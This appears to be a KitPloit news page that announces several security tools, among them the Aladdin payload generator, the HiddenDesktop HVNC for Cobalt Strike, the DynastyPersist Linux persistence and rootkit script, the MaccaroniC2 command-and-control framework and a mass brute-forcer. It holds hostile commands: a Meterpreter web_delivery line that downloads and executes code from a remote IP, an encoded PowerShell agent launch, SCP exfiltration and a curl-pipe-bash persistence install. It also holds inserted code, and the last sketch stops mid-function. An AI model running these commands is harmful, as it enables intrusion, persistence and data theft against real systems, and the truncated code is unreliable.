All the latest Cybersecurity news in the media KitPloit
T3SF - Technical Tabletop Exercises Simulation Framework
T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL), together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module communicates with the platform-specific module (Discord, Slack, Telegram, etc.) that presents the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".

Getting Things Ready

To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward. To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

# Python 3.6+ required
python -m venv .venv        # We will create a python virtual environment
source .venv/bin/activate   # Let's get inside it
pip install -U pip          # Upgrade pip

Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

pip install "T3SF[Discord]"   # Install the framework to work with Discord

or

pip install "T3SF[Slack]"     # Install the framework to work with Slack

This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice. We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links: Discord, Slack, Telegram, WhatsApp.

Usage

We created this framework to simplify all your work!
Using Docker

Supported Tags

slack → This image has all the requirements to perform an exercise in Slack.
discord → This image has all the requirements to perform an exercise in Discord.

Using it with Slack

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here. There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

Using it with Discord

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here. There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

Once you have everything ready, use our template for the main.py, or modify the following code. Here is an example if you want to run the framework with the Discord bot and a GUI:

from T3SF import T3SF
import asyncio

async def main():
    await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

if __name__ == '__main__':
    asyncio.run(main())

Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it! Yes, that simple!

await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

If you need more help, you can always check our documentation here!

Download T3SF
Source: KitPloit
Aladdin - Payload Generation Technique That Allows The Deserialization Of A .NET Payload And Execution In Memory
Aladdin is a payload generation technique based on the work of James Forshaw (@tiraniddo) that allows the deserialization of a .NET payload and execution in memory. The original vector was documented on https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html.

By spawning the process AddInProcess.exe with arguments /guid:32a91b0f-30cd-4c75-be79-ccbd6345de99 and /pid:, the process will start a named pipe under \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de99 and will wait for a .NET Remoting object. If we generate a payload that has the appropriate packet bytes required to communicate with a .NET remoting listener we will be able to trigger the ActivitySurrogateSelector class from System.Workflow.ComponentModel and gain code execution.

Originally, James Forshaw released a POC at https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData. However this POC will fail on recent versions of Windows since Microsoft went ahead and patched the vulnerable System.Workflow.ComponentModel (https://github.com/microsoft/dotnet-framework-early-access/blob/master/release-notes/NET48/dotnet-48-changes.md). Nick Landers (@monoxgas), however, identified a way to disable the check that Microsoft introduced and wrote a detailed article at https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/. The bypass is documented at pwntester/ysoserial.net#41.

Aladdin is a payload generation tool which, using the specific bypass as well as the necessary header bytes of the .NET remoting protocol, is able to generate initial access payloads that abuse the AddInProcess as originally documented.

The provided templates are:
* HTA
* VBA
* JS
* CHM

Notes

In order for the attack to be successful the .NET assembly must contain a single public class with an empty constructor to act as the entry point during deserialization. An example assembly has been included in the project.
Usage

Usage:
  -w, --scriptType=VALUE   Set to js / hta / vba / chm.
  -o, --output=VALUE       The generated output, e.g: -o C:\Users\Nettitude\Desktop\payload
  -a, --assembly=VALUE     Provided Assembly DLL, e.g: -a C:\Users\Nettitude\Desktop\popcalc.dll
  -h, --help               Help

OpSec

The user supplied .NET binary will be executed under the AddInProcess.exe that gets spawned from the HTA / JS payload. The spawning of the processes currently happens using the 9BA05972-F6A8-11CF-A442-00A0C90A8F39 COM object (https://dl.packetstormsecurity.net/papers/general/abusing-objects.pdf), which will launch the process as a child of the Explorer.exe process. The GUID supplied in the process parameters of AddInProcess.exe can be user controlled. At the moment the GUID is hardcoded in the template and the code. CHM executes the JScript through an XSLT transformation.

Defensive Considerations

AddInProcess.exe will always launch with /guid and /pid. Baseline your environment for legitimate uses and monitor the rest.

Useful References:
* https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html
* https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/

Readme / Credits

Code is based on the following repos:
* https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData
* https://github.com/pwntester/ysoserial.net

Shouts to:
@m0rv4i for helping with C# nuances
@ace0fspad3s for troubleshooting
@ Nettitude RT for being awesome

Download Aladdin
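One way to act on the Defensive Considerations above, written here as an added example and not part of the Aladdin project: parse process-creation events for AddInProcess.exe launches carrying /guid and /pid, drop the (parent, GUID) pairs already seen in a baseline of legitimate use, and alert on the rest, with the README's two indicators (a parent of Explorer.exe and the GUID hard-coded in the templates) called out as reasons. The event records, their field names and the baseline are constructed for this example and follow no particular product's schema.

```python
# Added example, not part of the Aladdin project: a baseline-and-alert check
# over process-creation events for AddInProcess.exe launches. The event records
# and the baseline below are constructed for this example, and the field names
# ("image", "parent", "cmdline") are an assumption rather than any product's schema.
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed process-creation events: a baselined launch, a launch matching the
# README's description (child of Explorer.exe, hard-coded GUID), and unrelated noise.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe",
     "parent": r"C:\Program Files\LineOfBusiness\Host.exe",
     "cmdline": "AddInProcess.exe /guid:11111111-2222-3333-4444-555555555555 /pid:4321"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "AddInProcess.exe /guid:32a91b0f-30cd-4c75-be79-ccbd6345de99 /pid:7788"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

# Baseline of (parent image, GUID) pairs seen during legitimate use. Constructed
# here; in practice it is built from the environment's own telemetry, as the
# README's defensive note suggests.
BASELINE: Set[Tuple[str, str]] = {("host.exe", "11111111-2222-3333-4444-555555555555")}

# GUID hard-coded in the published templates (taken from the README above).
TEMPLATE_GUID = "32a91b0f-30cd-4c75-be79-ccbd6345de99"

GUID_ARG = re.compile(r"/guid:(?P<guid>[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.IGNORECASE)
PID_ARG = re.compile(r"/pid:(?P<pid>\d+)", re.IGNORECASE)


def parse_addin_launch(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return parent name, GUID and PID of an AddInProcess.exe launch, else None.

    The README notes the process always starts with /guid and /pid, so both
    arguments must be present for the event to count as a launch of interest."""
    if not event["image"].lower().endswith("\\addinprocess.exe"):
        return None
    guid = GUID_ARG.search(event["cmdline"])
    pid = PID_ARG.search(event["cmdline"])
    if guid is None or pid is None:
        return None
    return {
        "parent": event["parent"].rsplit("\\", 1)[-1].lower(),
        "guid": guid.group("guid").lower(),
        "pid": pid.group("pid"),
    }


def triage(events: List[Dict[str, str]], baseline: Set[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Alert on every AddInProcess.exe launch whose (parent, GUID) pair is not baselined."""
    alerts: List[Dict[str, object]] = []
    for event in events:
        launch = parse_addin_launch(event)
        if launch is None or (launch["parent"], launch["guid"]) in baseline:
            continue
        reasons = []
        if launch["parent"] == "explorer.exe":
            reasons.append("parent is explorer.exe, the COM-object launch path the README describes")
        if launch["guid"] == TEMPLATE_GUID:
            reasons.append("GUID matches the one hard-coded in the published templates")
        if not reasons:
            reasons.append("(parent, guid) pair not seen in the baseline")
        alerts.append({**launch, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS, BASELINE):
        print(f"ALERT AddInProcess.exe pid={alert['pid']} parent={alert['parent']} guid={alert['guid']}")
        for reason in alert["reasons"]:
            print(f"  - {reason}")
```

Run against the constructed events, only the Explorer.exe child with the template GUID is reported; the baselined launch from Host.exe is suppressed, which is the "baseline your environment, monitor the rest" approach the README recommends. Because the GUID is user controlled, the baseline on (parent, GUID) pairs rather than the GUID alone is what catches a launch that changed the GUID but kept the launch path.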

Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS
WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview). It was inspired by ntdiff and made possible with the help of Winbindex.

How It Works

WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations, if you need to. See the next section for that.

Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information is unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

How to Build

Prerequisites

Rust 1.68 or later
Node.js 16.8 or later

Command-Line

The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

# Resolve the project's root folder
PROJECT_ROOT=$(git rev-parse --show-toplevel)

# Generate databases
cd "$PROJECT_ROOT/windiff_cli"
cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

# Build the frontend
cd "$PROJECT_ROOT/windiff_frontend"
npm ci
npm run build

The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.

Download Windiff
HiddenDesktop - HVNC For Cobalt Strike
Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.
HVNC shellcode: PIC implementation of TinyNuke HVNC.
Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.
Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.

Usage

Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:

hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome

You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]

Demo

Hidden.Desktop.mp4

Implementation Details

The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.

The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.

InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.

DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.

Compatibility

The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

Windows Server 2022 x64
Windows Server 2016 x64
Windows Server 2012 R2 x64
Windows Server 2008 x86
Windows 7 SP1 x64

Known Issues

The start menu is not functional.

Credits

Heavily based on TinyNuke
Included improvements/fixes from Meltedd/HVNC
Uses Beacon job interface and project structure from SecIdiot/netntlm

Download HiddenDesktop

Hackers without borders
HWB, for a better world in cyberspace. Hackers Without Borders is an international humanitarian association that provides emergency assistance to non-governmental institutions in the event of crises and disasters related to cyberattacks.

DynastyPersist - A Linux Persistence Tool!
A Linux persistence tool! A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.

Features

SSH Key Generation: Automatically generates SSH keys for covert access.
Cronjob Persistence: Sets up cronjobs for scheduled persistence.
Custom User with Root: Creates a custom user with root privileges.
RCE Persistence: Achieves persistence through remote code execution.
LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.
Bashrc Persistence: Modifies user-specific shell initialization files for persistence.
Systemd Service for Root: Sets up a systemd service for achieving root persistence.
LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.
Backdooring Message of the Day / Header: Backdoors system message display for covert access.
Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

Usage

Clone this repository to your local machine:

git clone https://github.com/Trevohack/DynastyPersist.git

One-liner:

curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Support

For support, email spaceshuttle.io.all@gmail.com or join our Discord server.

Discord: https://discord.gg/WYzu65Hp

Thank You!

Download DynastyPersist

MaccaroniC2 - A PoC Command And Control Framework That Utilizes The Powerful AsyncSSH
MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library, which provides an asynchronous client and server implementation of the SSHv2 protocol, and uses the PyNgrok wrapper for ngrok integration.

This tool is inspired by a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands from the attacker. The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more. Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, by using TOR to enhance anonymity.

Ngrok free account only allows the usage of one tunnel at a time. With some changes this tool could be perfect for a BOT-like C&C framework to control multiple SSH instances, but you would need to upgrade your plan on the Ngrok website, see https://ngrok.com/pricing

Setup and Procedure

1. Run python3 gen_rsa.py to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine.
2. Edit the asyncssh_server.py file and place the contents of the newly generated id_rsa.pub inside the pub_key variable. The asyncssh_server.py provides an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.
3. Create a free account on the Ngrok site and take note of the AUTH Token.
4. Add the AUTH token to the token variable in asyncssh_server.py; this needs to be hardcoded inside the ngrok_tunnel() function.
5. Create a free API key on the Ngrok website. Take note of the generated string.
6. Put the API key string in the api_key variable inside the async_commander.py file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.
7. Perform the same step for the get_endpoints.py file. This script retrieves various useful information about active tunnels.

Send commands to server

With async_commander.py you can send any command to the server. It automatically requests the Ngrok tunnel's domain and port activated by the victim using the Ngrok official API.

Please note also that the id_rsa needs to be in the same folder as async_commander.py

Basic Usage

Run server on victim machine:
python3 asyncssh_server.py

From the attacker machine send command using socks proxy:
python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050

Send command without using a proxy:
python3 asyncssh_commander.py "whoami"

Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):
python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte"

Meterpreter web_delivery module
python3 asyncssh_commander.py "python3 -c "import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());""

Get list of active tunnels:
python3 get_endpoints.py

Generate new RSA key pairs:
python3 gen_rsa.py

Advanced Usage

Using SFTP and SCP - you don't need a valid username, just the correct id_rsa

With proxy:
proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST
scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path

No proxy:
sftp -P PORT -i id_rsa ddddd@NGROK_HOST
scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path

Compiling with Nuitka

python -m pip install nuitka
python -m nuitka --standalone --onefile asyncssh_server.py

Weaponized server

https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py

For further information check the related article:
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it's important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.

Download MaccaroniC2
Mass-Bruter - Mass Bruteforce Network Protocols
Mass bruteforce network protocols

Info

Simple personal script to quickly mass bruteforce common services in a large scale of network. It will check for default credentials on ftp, ssh, mysql, mssql...etc. This was made for authorized red team penetration testing purpose only.

How it works

Use masscan (faster than nmap) to find alive hosts with common ports from network segment.
Parse ips and ports from masscan result.
Craft and run hydra commands to automatically bruteforce supported network services on devices.

Requirements

Kali linux or any preferred linux distribution
Python 3.10+

# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private ip range: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt

Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]

  Mass Bruteforce Script

Options:
  -q, --quick           Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle)
  -a, --all             Brute all services(Very Slow)
  -s, --show            Show result with successful login
  -f, --file-path PATH  The directory or file that contains masscan result [default: ./result/masscan/]
  --help                Show this message and exit.

Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Fetch cracked credentials:
python3 mass_bruteforce.py -s

Todo

Migrate with dpl4hydra
Optimize the code and functions
MultiProcessing

Any contributions are welcomed!

Download Mass-Bruter
OSINT-Framework - OSINT Framework
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

Please visit the framework at the link below and good hunting!

https://osintframework.com

Legend

(T) - Indicates a link to a tool that must be installed and run locally
(D) - Google Dork, for more information: Google Hacking
(R) - Requires registration
(M) - Indicates a URL that contains the search term and the URL itself must be edited manually

For Update Notifications

Follow me on Twitter: @jnordine - https://twitter.com/jnordine
Watch or star the project on GitHub: https://github.com/lockfale/osint-framework

Suggestions, Comments, Feedback

Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on GitHub or reach out on Twitter.

Contribute with a GitHub Pull Request

For new resources, please ensure that the site is available for public and free use.
Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
Submit pull request!

Thank you!

OSINT Framework Website

https://osintframework.com

Happy Hunting!

Download OSINT-Framework

Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities
Service that scans your Infrastructure as Code for common vulnerabilities.

Tool name: IaC Scan Runner
Docker image: xscanner/runner
PyPI package: iac-scan-runner
Documentation: docs
Contact us: xopera@xlab.si

Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) packages and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

Running

This section explains how to run the REST API.

Run with Docker

You can run the REST API using a public xscanner/runner Docker image as follows:

# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

Or you can build the image locally and run it as follows:

# build Docker container (it will take some time)
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

Run from CLI

To run using the IaC Scan Runner CLI:

# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run

Run from source

To run locally from source:

# Export env variables
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled
# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo
# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app

Usage and examples

This part will show one of the possible deployments and short examples on how to use API calls.

First we will clone the iac scan runner repository and run the API.

$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up

After this is done you can use the different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

Let's create a project named test.

curl -X 'POST' 'http://0.0.0.0/project?creator_id=test' -H 'accept: application/json' -d ''

A project id will be returned to us. For this example the project id is 1e7b2a91-2896-40fd-8d53-83db56088026.

For example, let's say we want to run all checks except ansible-lint. Let's disable it.

curl -X 'PUT' 'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' -H 'accept: application/json'

Now that the project is configured, we can simply choose the files that we want to scan and zip them. For IaC-Scan-Runner to work, files are expected to be compressed archives (usually zip files). In this case the response type will be json, but it is possible to change it to html. Please change YOUR.zip to the path of your file.

curl -X 'POST' 'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' -H 'accept: application/json' -H 'Content-Type: multipart/form-data' -F 'iac=@YOUR.zip;type=application/zip'

That is it.

Extending the scan workflow with new check tools

At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types.
Therefore, in this subsection, the sequence of steps required for that purpose is identified and described. For now the steps have to be performed manually, as described below, but it is planned to automate this procedure in the future via the API and to provide a user-friendly interface that will aid the user while importing new tools into the catalogue of checks that makes up the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.

Step 1 – Adding tool-specific class to checks directory

First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code:

iac-scan-runner/src/iac_scan_runner/checks/new_tool.py

The class of a new tool inherits the existing Check class, which provides a generalization of scan workflow tools. Moreover, it is necessary to provide an implementation of the following methods:

def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
def run(self, directory: str)

While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client ids and tokens), the second specifies how the tool itself is invoked via API or CLI and how its raw output is returned.

Step 2 – Adding the check tool class instance within ScanRunner constructor

Once the new class derived from Check is added to the IaC Scan Runner's source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and add it to the dictionary of IaC checks inside def init_checks(self).

A. Importing the check tool class

from iac_scan_runner.checks.tfsec import TfsecCheck

B. Creating new instance of check tool object inside init_checks

"""Initiate predefined check objects"""
new_tool = NewToolCheck()

C. Adding it to self.iac_checks dictionary inside init_checks

self.iac_checks = {
    new_tool.name: new_tool,
    …
}

Step 3 – Adding the check tool to the compatibility matrix inside Compatibility class

On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents the compatibility matrix should be extended as well. There are two possible cases:
a) a new file type should be added as a key, together with the list of relevant tools as value
b) a new tool should be added to the compatibility list for an existing file type.

compatibility_matrix = {
    "new_type": ["new_tool_1", "new_tool_2"],
    …
    "old_typeK": ["tool_1", … "tool_N", "new_tool_3"]
}

Step 4 – Providing the support for result summarization

Finally, the last step in the sequence of required modifications for scan workflow extension is to modify the class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following if-else structure should be included:

if check == "new_tool":
    if outcome.find("Check pass string") > -1:
        self.outcomes[check]["status"] = "Passed"
        return "Passed"
    else:
        self.outcomes[check]["status"] = "Problems"
        return "Problems"

Contact

You can contact the xOpera team by sending an email to xopera@xlab.si.

Acknowledgement

This project has received funding from the European Union's Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).

Download Iac-Scan-Runner
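The four extension steps above (tool-specific Check subclass, registration in init_checks, compatibility matrix entry, summarize_outcome branch) stitched into one runnable sketch, as an added example that is not the project's own code. The Check base class, init_checks, compatibility_matrix and summarize_outcome here are minimal stand-ins for the ScanRunner, Compatibility and ResultsSummary code they mirror, and the hypothetical tool "new_tool" only looks for a constructed marker string so that the example runs offline without any external scanner.

```python
# Added example, not the project's own code: the four extension steps from the
# section above stitched into one runnable sketch. The `Check` base class,
# `init_checks`, `compatibility_matrix` and `summarize_outcome` below are minimal
# stand-ins for the IaC Scan Runner classes they mirror (ScanRunner, Compatibility,
# ResultsSummary); the hypothetical tool "new_tool" looks for a constructed
# marker so the example runs offline without any external scanner.
import tempfile
from pathlib import Path
from typing import Dict, List, Optional


class SecretStr(str):
    """Stand-in for the SecretStr type in the page's method signature (assumed pydantic)."""


# Step 1: the generalization every tool-specific class inherits from (stand-in).
class Check:
    def __init__(self, name: str, description: str = ""):
        self.name = name
        self.description = description

    def configure(self, config_filename: Optional[str], secret: Optional[SecretStr]) -> None:
        raise NotImplementedError

    def run(self, directory: str) -> str:
        raise NotImplementedError


class NewToolCheck(Check):
    """Hypothetical 'new_tool': flags IaC files that embed a literal credential assignment."""

    PASS_STRING = "Check pass string"  # the tool-specific marker summarize_outcome searches for
    MARKER = "password ="              # constructed pattern standing in for a real scanner's rule

    def __init__(self) -> None:
        super().__init__("new_tool", "Example hard-coded credential check")
        self.secret: Optional[SecretStr] = None

    def configure(self, config_filename: Optional[str], secret: Optional[SecretStr]) -> None:
        # Tool-specific setup (tokens, client ids, ...) is kept on the instance.
        self.secret = secret

    def run(self, directory: str) -> str:
        # Raw output in the shape summarize_outcome expects: the pass string or a problem report.
        hits = sorted(
            str(p.relative_to(directory))
            for p in Path(directory).rglob("*")
            if p.is_file() and self.MARKER in p.read_text(errors="ignore")
        )
        return self.PASS_STRING if not hits else "Problems found in: " + ", ".join(hits)


# Step 2: what ScanRunner.init_checks does with the new instance.
def init_checks() -> Dict[str, Check]:
    """Initiate predefined check objects"""
    new_tool = NewToolCheck()
    return {new_tool.name: new_tool}


# Step 3: the compatibility matrix entry that maps a file type to the new tool.
compatibility_matrix: Dict[str, List[str]] = {"new_type": ["new_tool"]}


# Step 4: the if-else branch appended to ResultsSummary.summarize_outcome.
def summarize_outcome(check: str, outcome: str, outcomes: Dict[str, Dict[str, str]]) -> str:
    if check == "new_tool":
        status = "Passed" if outcome.find(NewToolCheck.PASS_STRING) > -1 else "Problems"
        outcomes.setdefault(check, {})["status"] = status
        return status
    return "Unknown"  # other tools carry their own branches


def scan_directory(directory: str) -> Dict[str, str]:
    """Run every check compatible with 'new_type' over `directory` and summarize each outcome."""
    checks = init_checks()
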